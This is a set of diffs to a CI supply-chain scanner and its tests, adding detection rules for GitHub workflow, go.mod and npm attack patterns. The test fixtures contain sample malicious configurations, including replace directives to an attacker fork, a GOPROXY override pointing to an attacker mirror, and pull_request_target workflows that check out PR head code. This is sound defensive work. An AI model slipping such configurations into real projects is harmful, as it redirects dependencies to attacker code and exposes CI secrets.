+        change = _fc(
+            "library/payments/kalshi/go.mod",
+            head=head,
+            added=[(6, "    example.com/foo => github.com/attacker/fork v0.0.1")],
+        )
+        findings = signals.signal_gomod_replace(change)
+        self.assertEqual(len(findings), 1)
+        self.assertTrue(findings[0].is_block())
+        self.assertEqual(findings[0].signal_id, "gomod_replace_remote_target")
+
+    def test_block_form_replace_to_local_advises(self) -> None:
+        head = (
+            "module github.com/mvanhorn/printing-press-library/library/food-and-dining/foo\n"
+            "\n"
+            "go 1.22\n"
+            "\n"
+            "replace (\n"
+            "    github.com/ledongthuc/pdf => ./third_party/stubs/pdf\n"
+            ")\n"
+        )
+        change = _fc(
+            "library/food-and-dining/foo/go.mod",
+            head=head,
+            added=[(6, "    github.com/ledongthuc/pdf => ./third_party/stubs/pdf")],
+        )
+        findings = signals.signal_gomod_replace(change)
+        self.assertEqual(len(findings), 1)
+        self.assertEqual(findings[0].severity, "advise")
+
+    def test_block_form_multiple_entries_all_flagged(self) -> None:
+        head = (
+            "module github.com/mvanhorn/printing-press-library/library/payments/kalshi\n"
+            "\n"
+            "go 1.22\n"
+            "\n"
+            "replace (\n"
+            "    example.com/foo => github.com/attacker/fork v0.0.1\n"
+            "    example.com/bar => github.com/other/fork v0.0.1\n"
+            "    example.com/baz => ./vendor/baz\n"
+            ")\n"
+        )
+        change = _fc(
+            "library/payments/kalshi/go.mod",
+            head=head,
+            added=[
+                (6, "    example.com/foo => github.com/attacker/fork v0.0.1"),
+                (7, "    example.com/bar => github.com/other/fork v0.0.1"),
+                (8, "    example.com/baz => ./vendor/baz"),
+            ],
+        )
+        findings = signals.signal_gomod_replace(change)
+        self.assertEqual(len(findings), 3)
+        # First two are remote-target → block.
+        self.assertTrue(findings[0].is_block())
+        self.assertTrue(findings[1].is_block())
+        # Third is local-path → advise.
+        self.assertEqual(findings[2].severity, "advise")
+
+    def test_arrow_outside_block_does_not_false_positive(self) -> None:
+        """A line containing `=>` that isn't inside a replace block (e.g., a
+        comment, a require directive's // indirect annotation, or a stray line)
+        must NOT trip the rule."""
+        head = (
+            "module github.com/mvanhorn/printing-press-library/library/x/y\n"
+            "\n"
+            "// some comment that mentions => arrow\n"
+            "require example.com/foo v1.0.0 // indirect\n"
+        )
+        change = _fc(
+            "library/x/y/go.mod",
+            head=head,
+            added=[(3, "// some comment that mentions => arrow")],
+        )
+        findings = signals.signal_gomod_replace(change)
+        self.assertEqual(findings, [])
+
 
 class GoEnvOverrideSignalTest(unittest.TestCase):
     def test_goproxy_in_workflow_blocks(self) -> None:

--- a/.github/scripts/verify-supply-chain/scan_test.py
+++ b/.github/scripts/verify-supply-chain/scan_test.py
@@ -524,6 +524,20 @@ class ModulePathDriftSignalTest(unittest.TestCase):
         self.assertTrue(findings[0].is_block())
         self.assertEqual(findings[0].signal_id, "module_path_noncanonical_on_new_cli")
 
+    def test_within_canonical_rename_blocks(self) -> None:
+        """Greptile-flagged: a rename that keeps the canonical prefix
+        (e.g., kalshi → kalshi-evil, both under github.com/.../library/) still
+        redirects `go install` for users pinned to the old slug. Must block."""
+        base = f"module {self.PREFIX}payments/kalshi\n\ngo 1.22\n"
+        head = f"module {self.PREFIX}payments/kalshi-evil\n\ngo 1.22\n"
+        # build_change in scan.py sets base_content from the OLD path on a
+        # rename; here we simulate that by populating base_content directly.
+        change = _fc("library/payments/kalshi-evil/go.mod", base=base, head=head)
+        findings = signals.signal_module_path_drift(change)
+        self.assertEqual(len(findings), 1)
+        self.assertTrue(findings[0].is_block())
+        self.assertEqual(findings[0].signal_id, "module_path_rename_on_existing_cli")
+
 
 # ---------------------------------------------------------------------------
 # Integration test: real git repo, end-to-end scan invocation
@@ -706,6 +720,22 @@ class ScanIntegrationTest(unittest.TestCase):
         self._git("checkout", "-q", "-b", "feat/x")
         self._write("library/payments/kalshi/go.mod", head)
         self._commit("rewrite module path")
+        rc = self._run_scan(base="main")
+        self.assertEqual(rc, 1)
+
+    def test_within_canonical_rename_detected_via_git_rename(self) -> None:
+        """End-to-end: git records a rename (kalshi → kalshi-evil), scan.py
+        passes old_path to signals.py via build_change, R6 fires with the
+        rename signal."""
+        base = "module github.com/mvanhorn/printing-press-library/library/payments/kalshi\n\ngo 1.22\n"
+        head = "module github.com/mvanhorn/printing-press-library/library/payments/kalshi-evil\n\ngo 1.22\n"
+        self._write("library/payments/kalshi/go.mod", base)
+        self._commit("baseline")
+        self._git("checkout", "-q", "-b", "feat/rename")
+        # Simulate rename: move directory + update module directive
+        self._git("mv", "library/payments/kalshi", "library/payments/kalshi-evil")
+        self._write("library/payments/kalshi-evil/go.mod", head)
+        self._commit("rename + module update")
         rc = self._run_scan(base="main")
         self.assertEqual(rc, 1)
 

--- a/.github/scripts/verify-supply-chain/scan_test.py
+++ b/.github/scripts/verify-supply-chain/scan_test.py
@@ -147,6 +147,55 @@ class WorkflowTrustSignalTest(unittest.TestCase):
         findings = signals.signal_workflow_trust(_fc(".github/workflows/ci.yml", head=wf))
         self.assertEqual(findings, [])
 
+    def test_flow_sequence_trigger_with_head_sha_blocks(self) -> None:
+        """Greptile-flagged evasion: compact YAML flow-sequence trigger form
+        `on: [pull_request_target, push]` must still be detected."""
+        wf = textwrap.dedent(
+            """
+            on: [pull_request_target, push]
+            jobs:
+              x:
+                steps:
+                  - uses: actions/checkout@v4
+                    with:
+                      ref: ${{ github.event.pull_request.head.sha }}
+            """
+        )
+        findings = signals.signal_workflow_trust(_fc(".github/workflows/bad.yml", head=wf))
+        self.assertEqual(len(findings), 1)
+        self.assertTrue(findings[0].is_block())
+
+    def test_flow_sequence_trigger_other_order_blocks(self) -> None:
+        wf = "on: [push, pull_request_target]\njobs:\n  x:\n    steps:\n      - uses: actions/checkout@v4\n        with:\n          ref: ${{ github.event.pull_request.head.sha }}\n"
+        findings = signals.signal_workflow_trust(_fc(".github/workflows/bad.yml", head=wf))
+        self.assertEqual(len(findings), 1)
+
+    def test_preexisting_dangerous_ref_unchanged_does_not_fire(self) -> None:
+        """Diff-awareness: a dangerous ref that pre-existed on base and was
+        not modified by this PR must NOT trip R1. Forward-looking guard
+        against false positives if main ever drifts to contain a flagged
+        pattern."""
+        wf = "on:\n  pull_request_target:\njobs:\n  x:\n    steps:\n      - uses: actions/checkout@v4\n        with:\n          ref: ${{ github.event.pull_request.head.sha }}\n"
+        # base_content non-None (existing file) + no added_lines → no findings
+        change = _fc(".github/workflows/legacy.yml", base=wf, head=wf, added=[])
+        findings = signals.signal_workflow_trust(change)
+        self.assertEqual(findings, [])
+
+    def test_dangerous_ref_added_to_existing_workflow_blocks(self) -> None:
+        """Diff-aware fire: the dangerous ref appears in added_lines on an
+        already-existing workflow. Must still flag."""
+        base = "on:\n  pull_request_target:\njobs:\n  x:\n    steps:\n      - uses: actions/checkout@v4\n"
+        head = base + "        with:\n          ref: ${{ github.event.pull_request.head.sha }}\n"
+        change = _fc(
+            ".github/workflows/legacy.yml",
+            base=base,
+            head=head,
+            added=[(8, "        with:"), (9, "          ref: ${{ github.event.pull_request.head.sha }}")],
+        )
+        findings = signals.signal_workflow_trust(change)
+        self.assertEqual(len(findings), 1)
+        self.assertTrue(findings[0].is_block())
+
 
 class IdTokenSignalTest(unittest.TestCase):
     def test_id_token_in_non_publish_workflow_blocks(self) -> None:
@@ -170,6 +219,28 @@ class IdTokenSignalTest(unittest.TestCase):
             _fc(".github/workflows/anything.yml", head=wf)
         )
         self.assertEqual(findings, [])
+
+    def test_preexisting_id_token_unchanged_does_not_fire(self) -> None:
+        """Diff-awareness: existing id-token grant on base (e.g., if main ever
+        adds another publishing workflow) must not be re-flagged on unrelated PRs."""
+        wf = "permissions:\n  id-token: write\n  contents: read\n"
+        change = _fc(".github/workflows/some-publish.yml", base=wf, head=wf, added=[])
+        findings = signals.signal_id_token_outside_allowlist(change)
+        self.assertEqual(findings, [])
+
+    def test_id_token_added_to_existing_workflow_blocks(self) -> None:
+        """Diff-aware fire: id-token: write added to a workflow that didn't have it before."""
+        base = "permissions:\n  contents: read\n"
+        head = "permissions:\n  id-token: write\n  contents: read\n"
+        change = _fc(
+            ".github/workflows/build.yml",
+            base=base,
+            head=head,
+            added=[(2, "  id-token: write")],
+        )
+        findings = signals.signal_id_token_outside_allowlist(change)
+        self.assertEqual(len(findings), 1)
+        self.assertTrue(findings[0].is_block())
 
 
 class GomodReplaceSignalTest(unittest.TestCase):
@@ -346,6 +417,26 @@ class GoEnvOverrideSignalTest(unittest.TestCase):
         wf = "env:\n  GO_VERSION: 1.22\n  CGO_ENABLED: 0\n"
         findings = signals.signal_go_env_override(_fc(".github/workflows/ok.yml", head=wf))
         self.assertEqual(findings, [])
+
+    def test_preexisting_goproxy_unchanged_does_not_fire(self) -> None:
+        """Diff-awareness: pre-existing GOPROXY on base shouldn't re-fire if
+        the diff doesn't touch it."""
+        wf = "env:\n  GOPROXY: https://corp.example/\n"
+        change = _fc(".github/workflows/legacy.yml", base=wf, head=wf, added=[])
+        findings = signals.signal_go_env_override(change)
+        self.assertEqual(findings, [])
+
+    def test_goproxy_added_blocks(self) -> None:
+        base = "jobs:\n  x:\n    runs-on: ubuntu-latest\n"
+        head = "jobs:\n  x:\n    runs-on: ubuntu-latest\n    env:\n      GOPROXY: https://mirror.attacker.example\n"
+        change = _fc(
+            ".github/workflows/build.yml",
+            base=base,
+            head=head,
+            added=[(4, "    env:"), (5, "      GOPROXY: https://mirror.attacker.example")],
+        )
+        findings = signals.signal_go_env_override(change)
+        self.assertEqual(len(findings), 1)
 
 
 class NpmLifecycleSignalTest(unittest.TestCase):

--- a/.github/scripts/verify-supply-chain/signals.py
+++ b/.github/scripts/verify-supply-chain/signals.py
@@ -227,7 +227,7 @@ def signal_workflow_trust(change: FileChange) -> list[Finding]:
 # ---------------------------------------------------------------------------
 
 
-_ID_TOKEN_WRITE = re.compile(r"^\s*id-token\s*:\s*write\s*$")
+_ID_TOKEN_WRITE = re.compile(r"^\s*id-token\s*:\s*write\s*(?:#.*)?$")
 
 
 def signal_id_token_outside_allowlist(change: FileChange) -> list[Finding]:

--- a/.github/scripts/verify-supply-chain/signals.py
+++ b/.github/scripts/verify-supply-chain/signals.py
@@ -1,0 +1,481 @@
+"""Signal catalog for the supply-chain scan.
+
+Each signal is a pure function that inspects a diff for a specific attack
+shape and returns Findings. No I/O. No network. Easy to unit-test.
+
+Signals are tiered by severity:
+  block  - hard-fail; exit code 1; PR cannot merge.
+  advise - notice only; exit code unchanged; surfaces for review.
+
+The catalog is intentionally regex-driven rather than YAML-parsed: the
+shapes we look for (id-token: write, GOPROXY env, replace directives,
+postinstall scripts) are line-level signals that survive every common
+YAML / JSON quirk and don't require a parser dependency.
+"""
+
+from __future__ import annotations
+
+import json
+import re
+from dataclasses import dataclass
+from pathlib import PurePosixPath
+
+
+# ---------------------------------------------------------------------------
+# Types
+# ---------------------------------------------------------------------------
+
+
+@dataclass(frozen=True)
+class Finding:
+    """A single signal hit at a specific file location."""
+
+    path: str
+    line: int | None
+    severity: str  # "block" | "advise"
+    signal_id: str
+    message: str
+    remediation: str
+
+    def is_block(self) -> bool:
+        return self.severity == "block"
+
+
+@dataclass(frozen=True)
+class FileChange:
+    """One file from a PR diff.
+
+    base_content is None when the file did not exist on the base ref (newly
+    added). head_content is None when the file was deleted on head. Most
+    signals fire only when head_content is non-None — we don't analyze
+    deletions.
+
+    added_lines is the list of (1-indexed line number, content) pairs for
+    lines added in this diff. It is the primary input for signals that
+    should only fire on *new* introductions, not on pre-existing state.
+    """
+
+    path: str
+    base_content: str | None
+    head_content: str | None
+    added_lines: list[tuple[int, str]]
+
+
+# ---------------------------------------------------------------------------
+# Path-scope helpers
+# ---------------------------------------------------------------------------
+
+
+def is_workflow(path: str) -> bool:
+    parts = PurePosixPath(path).parts
+    return (
+        len(parts) >= 3
+        and parts[0] == ".github"
+        and parts[1] == "workflows"
+        and (path.endswith(".yml") or path.endswith(".yaml"))
+    )
+
+
+def is_library_gomod(path: str) -> bool:
+    parts = PurePosixPath(path).parts
+    return len(parts) >= 4 and parts[0] == "library" and parts[-1] == "go.mod"
+
+
+def is_npm_package_json(path: str) -> bool:
+    return path == "npm/package.json"
+
+
+# Workflows allowed to grant `id-token: write`. Empty in the generator-repo
+# mirror; populated here for the published-library repo.
+ID_TOKEN_ALLOWLIST = {".github/workflows/npm-publish.yml"}
+
+# The canonical module-path prefix every library CLI must keep.
+CANONICAL_MODULE_PREFIX = "github.com/mvanhorn/printing-press-library/library/"
+
+
+# ---------------------------------------------------------------------------
+# R1: pull_request_target + non-default checkout ref (TanStack OIDC theft)
+# ---------------------------------------------------------------------------
+
+
+# Detects pull_request_target as a YAML trigger declaration:
+#   on:
+#     pull_request_target:        ← block form
+#     pull_request_target:        ← block form with types
+#       types: [...]
+#   on: pull_request_target       ← inline form
+#   on:
+#     - pull_request_target       ← list form
+# Anchored to line-start (after indent) so prose mentions inside comments
+# or string values don't false-positive.
+_PR_TARGET_TRIGGER = re.compile(
+    r"^\s*(?:-\s+|on\s*:\s*)?pull_request_target(?:\s*:|\s*$)",
+    re.MULTILINE,
+)
+_CHECKOUT_USES = re.compile(r"^\s*-\s*uses\s*:\s*actions/checkout", re.MULTILINE)
+_DANGEROUS_REF = re.compile(
+    r"ref\s*:\s*[^\n#]*"
+    r"(github\.event\.pull_request\.head\.(sha|ref)|refs/pull/[^\n]*?/(merge|head))",
+)
+
+
+def signal_workflow_trust(change: FileChange) -> list[Finding]:
+    """R1. A workflow that combines pull_request_target with a checkout of
+    the PR head ref is the TanStack mini-Shai-Hulud attack shape: the head
+    code runs with the elevated permissions of the base context, including
+    secrets and OIDC.
+    """
+    if not is_workflow(change.path) or change.head_content is None:
+        return []
+
+    content = change.head_content
+    if not _PR_TARGET_TRIGGER.search(content):
+        return []
+    if not _CHECKOUT_USES.search(content):
+        return []
+    match = _DANGEROUS_REF.search(content)
+    if not match:
+        return []
+
+    line = content.count("\n", 0, match.start()) + 1
+    return [
+        Finding(
+            path=change.path,
+            line=line,
+            severity="block",
+            signal_id="workflow_trust_pr_head_checkout",
+            message=(
+                "pull_request_target workflow checks out PR head code "
+                "(matched: %r). This is the TanStack mini-Shai-Hulud attack "
+                "shape — head code runs with base-context secrets and OIDC." % match.group(0).strip()
+            ),
+            remediation=(
+                "Use `pull_request` instead, or omit the `ref:` override on "
+                "actions/checkout so it stays on the base commit. Never run "
+                "PR head code under pull_request_target."
+            ),
+        )
+    ]
+
+
+# ---------------------------------------------------------------------------
+# R2: id-token: write outside the publishing allowlist
+# ---------------------------------------------------------------------------
+
+
+_ID_TOKEN_WRITE = re.compile(r"^\s*id-token\s*:\s*write\s*$", re.MULTILINE)
+
+
+def signal_id_token_outside_allowlist(change: FileChange) -> list[Finding]:
+    """R2. id-token: write mints OIDC tokens the publisher uses to push to
+    npm, Sigstore, AWS, etc. It should exist only in the workflow(s) that
+    actually publish. Anywhere else is a leak vector.
+    """
+    if not is_workflow(change.path) or change.head_content is None:
+        return []
+    if change.path in ID_TOKEN_ALLOWLIST:
+        return []
+
+    findings: list[Finding] = []
+    for match in _ID_TOKEN_WRITE.finditer(change.head_content):
+        line = change.head_content.count("\n", 0, match.start()) + 1
+        findings.append(
+            Finding(
+                path=change.path,
+                line=line,
+                severity="block",
+                signal_id="id_token_outside_allowlist",
+                message=(
+                    "id-token: write is granted in a workflow outside the "
+                    "publishing allowlist (%s)." % ", ".join(sorted(ID_TOKEN_ALLOWLIST))
+                ),
+                remediation=(
+                    "Remove the id-token permission, or move the publishing "
+                    "logic into a workflow file already on the allowlist. "
+                    "OIDC scopes are credentials — narrow them."
+                ),
+            )
+        )
+    return findings
+
+
+# ---------------------------------------------------------------------------
+# R3: replace directives in library go.mod (BufferZoneCorp)
+# ---------------------------------------------------------------------------
+
+
+# Captures: `replace <module> => <target>` and `replace <module> <version> => <target> [<version>]`
+_REPLACE_LINE = re.compile(
+    r"^\s*replace\s+\S+(?:\s+v\S+)?\s*=>\s*(?P<target>\S+)"
+)
+
+
+def _classify_replace_target(target: str) -> str:
+    """Return 'remote' or 'local' for a replace directive target.
+
+    Local: starts with `./`, `../`, or `/` (absolute path).
+    Remote: contains a host segment (`example.com/...`) or scheme.
+    """
+    if target.startswith(("./", "../", "/")):
+        return "local"
+    if "://" in target:
+        return "remote"
+    # bare host pattern: `example.com/path` — anything with a dot before the first slash.
+    head = target.split("/", 1)[0]
+    if "." in head:
+        return "remote"
+    return "local"  # conservative
+
+
+def signal_gomod_replace(change: FileChange) -> list[Finding]:
+    """R3. New `replace` directives in library/**/go.mod. Tiered:
+      - remote target → block (BufferZoneCorp redirect-to-attacker-fork shape).
+      - local target  → advise (legitimate vendoring, but still worth a look).
+    """
+    if not is_library_gomod(change.path):
+        return []
+
+    findings: list[Finding] = []
+    for line_no, line_content in change.added_lines:
+        match = _REPLACE_LINE.match(line_content)
+        if not match:
+            continue
+        target = match.group("target")
+        kind = _classify_replace_target(target)
+        if kind == "remote":
+            findings.append(
+                Finding(
+                    path=change.path,
+                    line=line_no,
+                    severity="block",
+                    signal_id="gomod_replace_remote_target",
+                    message=(
+                        "New `replace` directive in go.mod redirects to a remote "
+                        "target (%s). This is the BufferZoneCorp attack shape — "
+                        "a published CLI silently pulling from an attacker fork." % target
+                    ),
+                    remediation=(
+                        "Remove the replace directive. If a forked dependency is "
+                        "genuinely required, vendor it locally (./third_party/...) "
+                        "and record the customization in .printing-press-patches.json."
+                    ),
+                )
+            )
+        else:
+            findings.append(
+                Finding(
+                    path=change.path,
+                    line=line_no,
+                    severity="advise",
+                    signal_id="gomod_replace_local_target",
+                    message=(
+                        "New `replace` directive in go.mod points at a local path (%s). "
+                        "Likely legitimate vendoring; flagging for review." % target
+                    ),
+                    remediation=(
+                        "Confirm the local path is checked into the same PR and that "
+                        ".printing-press-patches.json records the customization."
+                    ),
+                )
+            )
+    return findings
+
+
+# ---------------------------------------------------------------------------
+# R4: GOPROXY / GOFLAGS / GONOSUMCHECK overrides in workflows
+# ---------------------------------------------------------------------------
+
+
+_GO_ENV_OVERRIDE = re.compile(
+    r"^\s*(GOPROXY|GOFLAGS|GONOSUMCHECK|GOSUMDB|GONOSUMDB)\s*:\s*\S",
+    re.MULTILINE,
+)
+
+
+def signal_go_env_override(change: FileChange) -> list[Finding]:
+    """R4. Setting GOPROXY / GOFLAGS / GONOSUMCHECK / GOSUMDB inside a
+    workflow env block lets an attacker redirect module resolution or
+    suppress checksum verification (BufferZoneCorp).
+    """
+    if not is_workflow(change.path) or change.head_content is None:
+        return []
+
+    findings: list[Finding] = []
+    for match in _GO_ENV_OVERRIDE.finditer(change.head_content):
+        line = change.head_content.count("\n", 0, match.start()) + 1
+        var = match.group(1)
+        findings.append(
+            Finding(
+                path=change.path,
+                line=line,
+                severity="block",
+                signal_id="go_env_override_in_workflow",
+                message=(
+                    "Workflow sets %s in an env block. This can redirect Go "
+                    "module resolution to an attacker proxy or suppress "
+                    "checksum verification (BufferZoneCorp attack shape)." % var
+                ),
+                remediation=(
+                    "Remove the env override. If a private GOPROXY is required, "
+                    "configure it at the org or runner level under operator review, "
+                    "not in a workflow file that PRs can modify."
+                ),
+            )
+        )
+    return findings
+
+
+# ---------------------------------------------------------------------------
+# R5: postinstall / preinstall / prepare scripts added to npm/package.json
+# ---------------------------------------------------------------------------
+
+
+_WATCHED_NPM_SCRIPTS = ("preinstall", "postinstall", "prepare")
+
+
+def signal_npm_lifecycle_script(change: FileChange) -> list[Finding]:
+    """R5. Adding postinstall / preinstall / prepare to npm/package.json is
+    the Axios attack shape: the lifecycle hook fires on every `npm install`
+    or `npx` invocation and runs attacker code in user shells.
+    """
+    if not is_npm_package_json(change.path) or change.head_content is None:
+        return []
+
+    try:
+        head_data = json.loads(change.head_content)
+    except (json.JSONDecodeError, TypeError):
+        return []
+    base_data: dict = {}
+    if change.base_content:
+        try:
+            base_data = json.loads(change.base_content)
+        except (json.JSONDecodeError, TypeError):
+            base_data = {}
+
+    head_scripts = head_data.get("scripts", {}) if isinstance(head_data, dict) else {}
+    base_scripts = base_data.get("scripts", {}) if isinstance(base_data, dict) else {}
+
+    findings: list[Finding] = []
+    for name in _WATCHED_NPM_SCRIPTS:
+        if name in head_scripts and name not in base_scripts:
+            findings.append(
+                Finding(
+                    path=change.path,
+                    line=None,
+                    severity="block",
+                    signal_id="npm_lifecycle_script_added",
+                    message=(
+                        "New `%s` script added to npm/package.json. Lifecycle hooks "
+                        "fire on every install (Axios / TanStack attack shape)." % name
+                    ),
+                    remediation=(
+                        "Remove the lifecycle hook. Build steps belong in CI before "
+                        "publish, not in scripts that run on user machines."
+                    ),
+                )
+            )
+    return findings
+
+
+# ---------------------------------------------------------------------------
+# R6: module-path drift on existing library go.mod
+# ---------------------------------------------------------------------------
+
+
+_MODULE_DIRECTIVE = re.compile(r"^\s*module\s+(\S+)", re.MULTILINE)
+
+
+def _extract_module_path(content: str | None) -> str | None:
+    if not content:
+        return None
+    match = _MODULE_DIRECTIVE.search(content)
+    return match.group(1) if match else None
+
+
+def signal_module_path_drift(change: FileChange) -> list[Finding]:
+    """R6. The `module` directive in library/**/go.mod is what the registry
+    generator (and downstream `go install`) uses to resolve the published
+    binary. A PR that rewrites it on an existing CLI to a non-canonical
+    path silently redirects every future install.
+    """
+    if not is_library_gomod(change.path):
+        return []
+    if change.head_content is None:
+        return []
+
+    head_module = _extract_module_path(change.head_content)
+    if head_module is None:
+        return []
+
+    base_module = _extract_module_path(change.base_content)
+
+    # New CLI: we still require canonical prefix.
+    if base_module is None:
+        if not head_module.startswith(CANONICAL_MODULE_PREFIX):
+            return [
+                Finding(
+                    path=change.path,
+                    line=_find_line(change.head_content, head_module),
+                    severity="block",
+                    signal_id="module_path_noncanonical_on_new_cli",
+                    message=(
+                        "New library go.mod declares module %s which does not start "
+                        "with the canonical prefix %s." % (head_module, CANONICAL_MODULE_PREFIX)
+                    ),
+                    remediation=(
+                        "Use the canonical form: module %s<category>/<slug>." % CANONICAL_MODULE_PREFIX
+                    ),
+                )
+            ]
+        return []
+
+    # Existing CLI: module must not change to a non-canonical value.
+    if head_module != base_module and not head_module.startswith(CANONICAL_MODULE_PREFIX):
+        return [
+            Finding(
+                path=change.path,
+                line=_find_line(change.head_content, head_module),
+                severity="block",
+                signal_id="module_path_drift_on_existing_cli",
+                message=(
+                    "module directive on an existing library CLI changed from %s "
+                    "to %s, which is outside the canonical prefix %s. This silently "
+                    "redirects `go install` for every user." % (base_module, head_module, CANONICAL_MODULE_PREFIX)
+                ),
+                remediation=(
+                    "Revert the module directive. Renaming or moving a published CLI "
+                    "is a generator-repo operation, not a manual go.mod edit."
+                ),
+            )
+        ]
+
+    return []
+
+
+def _find_line(content: str, needle: str) -> int | None:
+    for idx, line in enumerate(content.splitlines(), start=1):
+        if needle in line:
+            return idx
+    return None
+
+
+# ---------------------------------------------------------------------------
+# Signal dispatch
+# ---------------------------------------------------------------------------
+
+
+ALL_SIGNALS = (
+    signal_workflow_trust,
+    signal_id_token_outside_allowlist,
+    signal_gomod_replace,
+    signal_go_env_override,
+    signal_npm_lifecycle_script,
+    signal_module_path_drift,
+)
+
+
+def run_signals(change: FileChange) -> list[Finding]:
+    findings: list[Finding] = []
+    for sig in ALL_SIGNALS:
+        findings.extend(sig(change))
+    return findings

--- a/.github/scripts/verify-supply-chain/signals.py
+++ b/.github/scripts/verify-supply-chain/signals.py
@@ -98,20 +98,33 @@ CANONICAL_MODULE_PREFIX = "github.com/mvanhorn/printing-press-library/library/"
 # ---------------------------------------------------------------------------
 
 
-# Detects pull_request_target as a YAML trigger declaration:
+# Detects pull_request_target as a YAML trigger declaration in any of YAML's
+# valid forms:
 #   on:
-#     pull_request_target:        ← block form
-#     pull_request_target:        ← block form with types
+#     pull_request_target:                ← block form
+#     pull_request_target:                ← block form with types
 #       types: [...]
-#   on: pull_request_target       ← inline form
+#   on: pull_request_target               ← inline form
 #   on:
-#     - pull_request_target       ← list form
-# Anchored to line-start (after indent) so prose mentions inside comments
-# or string values don't false-positive.
-_PR_TARGET_TRIGGER = re.compile(
+#     - pull_request_target               ← list form
+#   on: [pull_request_target, push]       ← flow-sequence form
+# Anchored so prose mentions inside comments or string values don't false-fire.
+_PR_TARGET_TRIGGER_LINE = re.compile(
     r"^\s*(?:-\s+|on\s*:\s*)?pull_request_target(?:\s*:|\s*$)",
     re.MULTILINE,
 )
+_PR_TARGET_TRIGGER_FLOW = re.compile(
+    r"^\s*on\s*:\s*\[[^\]\n]*\bpull_request_target\b",
+    re.MULTILINE,
+)
+
+
+def _has_pr_target_trigger(content: str) -> bool:
+    return bool(
+        _PR_TARGET_TRIGGER_LINE.search(content) or _PR_TARGET_TRIGGER_FLOW.search(content)
+    )
+
+
 _CHECKOUT_USES = re.compile(r"^\s*-\s*uses\s*:\s*actions/checkout", re.MULTILINE)
 _DANGEROUS_REF = re.compile(
     r"ref\s*:\s*[^\n#]*"
@@ -119,35 +132,86 @@ _DANGEROUS_REF = re.compile(
 )
 
 
+def _lines_to_scan(change: FileChange) -> list[tuple[int, str]]:
+    """Return [(line_no, content)] for lines that should be scanned for new
+    additions. Diff-aware semantics:
+
+      - File didn't exist on base (new file)  → every head line is "new".
+      - File existed on base                 → only the added_lines diff.
+
+    Lets R1/R2/R4 fire only on newly-introduced patterns. An attacker can't
+    silently re-introduce a dangerous pattern that pre-existed on main, and
+    unrelated PRs don't get false-flagged because main happens to contain a
+    legitimate pattern in some allowlisted location.
+    """
+    if change.head_content is None:
+        return []
+    if change.base_content is None:
+        return list(enumerate(change.head_content.splitlines(), start=1))
+    return list(change.added_lines)
+
+
 def signal_workflow_trust(change: FileChange) -> list[Finding]:
     """R1. A workflow that combines pull_request_target with a checkout of
-    the PR head ref is the TanStack mini-Shai-Hulud attack shape: the head
+    the PR head ref is the TanStack mini-Shai-Hulud attack shape — head
     code runs with the elevated permissions of the base context, including
     secrets and OIDC.
+
+    Fires when:
+      - The file's HEAD contains both a pull_request_target trigger AND an
+        actions/checkout step (these are the prerequisites — they may exist
+        on base unchanged, and that's fine).
+      - At least one *newly-introduced* line carries a dangerous ref OR is
+        itself the trigger / checkout (so a freshly added attack shape is
+        caught regardless of which of the three components landed last).
     """
     if not is_workflow(change.path) or change.head_content is None:
         return []
 
     content = change.head_content
-    if not _PR_TARGET_TRIGGER.search(content):
+    if not _has_pr_target_trigger(content):
         return []
     if not _CHECKOUT_USES.search(content):
         return []
-    match = _DANGEROUS_REF.search(content)
-    if not match:
+
+    danger_match = _DANGEROUS_REF.search(content)
+    if not danger_match:
         return []
 
-    line = content.count("\n", 0, match.start()) + 1
+    # Diff-aware: fire only if any of the three attack ingredients was
+    # introduced by this PR. For a new file every line is "new" so the
+    # full-content match implicitly counts.
+    relevant_lines = _lines_to_scan(change)
+    introduced_here = False
+    danger_line: int | None = None
+    danger_text: str = danger_match.group(0).strip()
+    for line_no, line in relevant_lines:
+        if _DANGEROUS_REF.search(line):
+            introduced_here = True
+            danger_line = line_no
+            danger_text = _DANGEROUS_REF.search(line).group(0).strip()
+            break
+        if _has_pr_target_trigger(line) or _CHECKOUT_USES.search(line):
+            introduced_here = True
+
+    if not introduced_here:
+        return []
+
+    if danger_line is None:
+        # Trigger or checkout was newly added; dangerous ref was already on
+        # base. Report at the dangerous-ref position from head_content.
+        danger_line = content.count("\n", 0, danger_match.start()) + 1
+
     return [
         Finding(
             path=change.path,
-            line=line,
+            line=danger_line,
             severity="block",
             signal_id="workflow_trust_pr_head_checkout",
             message=(
                 "pull_request_target workflow checks out PR head code "
                 "(matched: %r). This is the TanStack mini-Shai-Hulud attack "
-                "shape — head code runs with base-context secrets and OIDC." % match.group(0).strip()
+                "shape — head code runs with base-context secrets and OIDC." % danger_text
             ),
             remediation=(
                 "Use `pull_request` instead, or omit the `ref:` override on "
@@ -163,13 +227,16 @@ def signal_workflow_trust(change: FileChange) -> list[Finding]:
 # ---------------------------------------------------------------------------
 
 
-_ID_TOKEN_WRITE = re.compile(r"^\s*id-token\s*:\s*write\s*$", re.MULTILINE)
+_ID_TOKEN_WRITE = re.compile(r"^\s*id-token\s*:\s*write\s*$")
 
 
 def signal_id_token_outside_allowlist(change: FileChange) -> list[Finding]:
     """R2. id-token: write mints OIDC tokens the publisher uses to push to
     npm, Sigstore, AWS, etc. It should exist only in the workflow(s) that
     actually publish. Anywhere else is a leak vector.
+
+    Diff-aware: fires only when the line is newly introduced (added in this
+    PR or part of a new file). Pre-existing grants on base aren't re-flagged.
     """
     if not is_workflow(change.path) or change.head_content is None:
         return []
@@ -177,12 +244,13 @@ def signal_id_token_outside_allowlist(change: FileChange) -> list[Finding]:
         return []
 
     findings: list[Finding] = []
-    for match in _ID_TOKEN_WRITE.finditer(change.head_content):
-        line = change.head_content.count("\n", 0, match.start()) + 1
+    for line_no, line_content in _lines_to_scan(change):
+        if not _ID_TOKEN_WRITE.match(line_content):
+            continue
         findings.append(
             Finding(
                 path=change.path,
-                line=line,
+                line=line_no,
                 severity="block",
                 signal_id="id_token_outside_allowlist",
                 message=(
@@ -338,8 +406,7 @@ def signal_gomod_replace(change: FileChange) -> list[Finding]:
 
 
 _GO_ENV_OVERRIDE = re.compile(
-    r"^\s*(GOPROXY|GOFLAGS|GONOSUMCHECK|GOSUMDB|GONOSUMDB)\s*:\s*\S",
-    re.MULTILINE,
+    r"^\s*(GOPROXY|GOFLAGS|GONOSUMCHECK|GOSUMDB|GONOSUMDB)\s*:\s*\S"
 )
 
 
@@ -347,18 +414,22 @@ def signal_go_env_override(change: FileChange) -> list[Finding]:
     """R4. Setting GOPROXY / GOFLAGS / GONOSUMCHECK / GOSUMDB inside a
     workflow env block lets an attacker redirect module resolution or
     suppress checksum verification (BufferZoneCorp).
+
